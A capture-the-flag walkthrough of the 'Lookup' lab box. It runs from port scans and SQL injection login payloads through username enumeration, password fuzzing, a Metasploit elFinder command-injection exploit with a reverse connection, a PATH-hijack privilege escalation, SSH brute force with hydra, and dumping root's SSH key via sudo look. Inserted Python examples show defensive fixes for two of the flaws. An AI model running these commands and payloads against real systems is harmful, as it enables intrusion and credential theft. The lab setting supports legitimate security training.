Lookup Box

2025-09-01 14:52  •  web / ffuf / burp / metasploit / privesc

First, test for connectivity.

Ping target IP
I ping the given IP — connection all good.

Nmap scan for open ports

Nmap running
While nmap is running I try to open the IP in the browser.
Browser error before hosts entry
There is a domain name: lookup.thm

So I go to configure the hosts entry for the IP, for it to be able to open
(to be able to talk with the DNS).

nano or vim /etc/hosts

Editing /etc/hosts
After adding the IP with its domain name for the DNS, when I refresh it shows a login page !!!

Nmap result

Nmap results show ports
2 ports are open after scan — http (80) and ssh (22)

I'm stuckkk here @.@

But I ran gobuster in the background, maybe I find something more.

Gobuster
gobuster running

> Interestingly !!! when I ffuf it I found something !!

ffuf initial findings
But the status code is not 200 so I can't really open it, but we can know there is something.

And then I try using feroxbuster to scan again.

feroxbuster finds login.php
Interestingly I found a login.php.

Then I try to Burp Suite it.

Burp intercepts login.php request
burp repeater set up
Req
Resp

First of all I try some of the basic SQLi payloads like:

admin'1 OR '1'='1 -- &password
admin'1 OR '1'='1 # &password
admin' OR '1'='1 --password
admin' OR  1=1 -- password
username=' OR 'a'='a&password=test
username=' OR '1'='1'/*&password=anything
username=1' OR 1=1 -- &password=anything
No SQLi
> nothing interesting

So I try generic or just general usernames, admin or root.

> something interesting here

Req
Resp
I first tried a username with the same length (5 characters), such as admia, and used any password of equal length, like testt. When I switched the username to admin, the response changed — it only reported a wrong password. This suggests that admin is a valid username, while admia triggers an error indicating both fields are invalid. I also noticed the Content-Length in the responses is different.
ffuf -w /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt \
  -X POST -u http://lookup.thm/login.php \
  -d "username=FUZZ&password=abbb" \
  -H "Content-Type: application/x-www-form-urlencoded"

Now I start fuzzing for possible passwords for the user admin.

ffuf password fuzzing admin
> the pass I found: password123

Then I tried BurpSuite again.

But somehow the password didn’t work for admin? So I changed the password a bit to test.

Req
Resp
Using the password with the admin user gives the generic error as before.
But if I change or delete just one letter in the password, the response switches back to “wrong password.”

So here I think the username admin is valid, but the password for that username might not be correct.

Because when I tested the password found by ffuf:
- First I tried password123 with user admin; it said “both wrong.”
- But if I try password12 (missing one char), the output changes to just “wrong password.”

ffuf usernames using found password
Then I tried ffuf again with the password I found and fuzzed the usernames. Got a 302 redirect for jose with password123 → valid credential pair.
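The length/wording difference used above is the classic user-enumeration leak. As an added example (not code from the writeup or from the box), here is a minimal login check in the leaky form that mirrors what login.php did and in a uniform form that does not reveal whether the username exists, plus the same comparison the writeup made by hand. The user store, messages and password hash are constructed for the demo.

```python
import hashlib
import hmac

# Constructed demo store (not data from the box): username -> sha256(password).
# A real app would use a slow password hash (bcrypt/argon2); sha256 keeps the demo short.
USERS = {"jose": hashlib.sha256(b"password123").hexdigest()}
DUMMY_HASH = hashlib.sha256(b"dummy-so-unknown-users-take-the-same-path").hexdigest()


def _h(password):
    return hashlib.sha256(password.encode()).hexdigest()


def leaky_login(username, password):
    """Mirrors what the writeup observed: the wording (and so Content-Length)
    tells you whether the username exists before the password is even right."""
    if username not in USERS:
        return 200, "Wrong username or password. Please try again."
    if not hmac.compare_digest(_h(password), USERS[username]):
        return 200, "Wrong password. Please try again."
    return 302, "Location: /files"


def uniform_login(username, password):
    """Hardened: one fixed failure message, and the hash comparison runs even for
    unknown users so both failure paths look (and cost) the same."""
    stored = USERS.get(username, DUMMY_HASH)
    ok = hmac.compare_digest(_h(password), stored) and username in USERS
    if not ok:
        return 200, "Invalid username or password."
    return 302, "Location: /files"


def leaks_user_existence(login, known, unknown, password="abbb"):
    """The check done by hand in the writeup: compare status, body and body length
    for a valid vs an invalid username under the same wrong password."""
    a, b = login(known, password), login(unknown, password)
    return a[0] != b[0] or len(a[1]) != len(b[1]) or a[1] != b[1]
```

Running leaks_user_existence over the two handlers reproduces the writeup's admin/admia observation for the leaky one and shows the uniform one gives nothing to fuzz against.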

And then I use what we got, the username jose and the pass password123, to try to log in to the page.

Login Success
Resp
Interestingly, it redirects to another page named files.lookup.thm, so we add this to /etc/hosts.
Req
Resp
After refreshing, the website shows something like a file manager system??
A bit of Google and I found out it's elFinder (open-source web application file manager).

tbh I kinda idk what to do here next. I look into the repo and stuff and then I try to google elfinder exploit. Saw some interesting links and an existing CVE for elFinder. Maybe this version is old too?? So I try to go find the version on the site.

elFinder about/version
In the About dialog here we can see its version: 2.1.47
We found the exact exploit for the vuln yayyyy (elFinder 2.1.47 command injection).

Metasploit foothold

Req
Resp
msfconsole
    search elfinder
    use exploit/multi/http/elfinder_php_connector_exiftran_cmd_injection
    set RHOSTS files.lookup.thm
    set LHOST <your_kali_ip>
    exploit
Meterpreter www-data
After running getuid, we have a shell as www-data!!!

Privilege Escalation Enumeration

After getting a shell as www-data, I checked /etc/passwd and found root, think, ssm-user, ubuntu.

Req

Next, I explored the user directories. In /home/think I found an interesting file called .passwords but I don’t have permission to read it.

/home/think/.passwords exists
Okay, if I can’t read it directly, maybe privesc via SUID can help.
find / -perm -4000 2>/dev/null
find SUID results
one entry stands out: /usr/sbin/pwm (not a default SUID)
Req
Resp
Running it shows it calls id and then tries /home/<username>/.passwords.

PATH hijack to dump think’s passwords

The binary doesn’t use an absolute path for id, so we hijack it with our own script that says we are think:

export PATH=/tmp:$PATH
echo -e '#!/bin/bash\necho "uid=1000(think) gid=1000(think) groups=1000(think)"' > /tmp/id
chmod +x /tmp/id
/usr/sbin/pwm     # now it reads /home/think/.passwords
Dumped passwords content
Password list dumped — save it and try to brute force the user back on my VM.
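Why the trick works, and what the binary should have done instead, as an added example (not code from the writeup and not the real pwm): user_via_path_lookup resolves id through PATH and trusts its text, exactly like a relative system("id"); user_via_getuid asks the kernel for the real uid, so PATH cannot influence it. demo() builds a throwaway directory with a constructed id script that claims to be think.

```python
import os
import pwd
import re
import shutil
import stat
import subprocess
import tempfile


def user_via_path_lookup(path_env):
    """What a relative system("id") does: find `id` through PATH, run it, parse the name."""
    exe = shutil.which("id", path=path_env)
    if exe is None:
        raise FileNotFoundError("id not found in PATH")
    out = subprocess.run([exe], capture_output=True, text=True, check=True).stdout
    m = re.search(r"uid=\d+\(([^)]+)\)", out)
    return m.group(1) if m else None


def user_via_getuid():
    """Hardened: the real uid comes from the kernel, not from an external program."""
    uid = os.getuid()
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:  # uid with no passwd entry (e.g. minimal containers)
        return str(uid)


def demo():
    """Constructed setup: a temp dir holding a script named `id` that claims to be think,
    prepended to PATH the same way the writeup did with /tmp."""
    d = tempfile.mkdtemp()
    try:
        fake = os.path.join(d, "id")
        with open(fake, "w") as f:
            f.write('#!/bin/sh\necho "uid=1000(think) gid=1000(think) groups=1000(think)"\n')
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        hijacked_path = d + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        return {
            "path_lookup": user_via_path_lookup(hijacked_path),  # "think" for any caller
            "getuid": user_via_getuid(),  # the caller who actually ran it
        }
    finally:
        shutil.rmtree(d, ignore_errors=True)
```

The fix for a SUID helper like pwm is the getuid/getpwuid route (or at least an absolute /usr/bin/id with a reset PATH), since anything resolved through the caller's environment is under the caller's control.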

Get user think

# pick your tool:
hydra -l think -P think_pass.txt ssh://lookup.thm
# or:
medusa -h lookup.thm -u think -P think_pass.txt -M ssh
Req
Resp
Success! ssh as think — user flag
Note: user flag can be found here :D

think → root with sudo look

sudo -l
# shows allowed: (ALL) /usr/bin/look
sudo /usr/bin/look '' /root/.ssh/id_rsa
Root SSH key dumped
Dump root’s private key, copy it to Kali, set perms, ssh as root:
chmod 600 root_key
ssh -i root_key root@lookup.thm
Root shell and flag
We're in! Got the root flag and done :D
